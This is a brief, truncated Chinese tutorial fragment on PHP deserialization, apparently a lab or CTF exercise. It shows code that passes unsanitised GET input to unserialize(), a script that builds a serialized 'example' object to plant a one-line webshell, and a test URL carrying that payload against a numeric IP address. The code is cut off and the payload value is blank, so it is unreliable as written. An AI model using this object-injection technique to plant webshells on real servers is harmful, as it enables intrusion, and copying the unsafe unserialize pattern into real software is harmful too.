反序列化
漏洞代码
var); fclose($fb); } } $class = $_GET['code']; $class_unser = unserialize($class); unset($class_unser); ?>
写一个php的脚本,执行得到一串序列化后字符串,生成的代码是不会在浏览器直接显示的,需要查看源码才能看到完整内容。
';//一句话木马}$a=new example();//顶替原来的example,从而执行destruct函数,所以名称还是要写成exampleecho serialize($a);//输出序列化后的结果?>
测试方法
http://218.2.197.236:26225/?code=O:7:"example":1:{s:3:"var";s:31:" ";}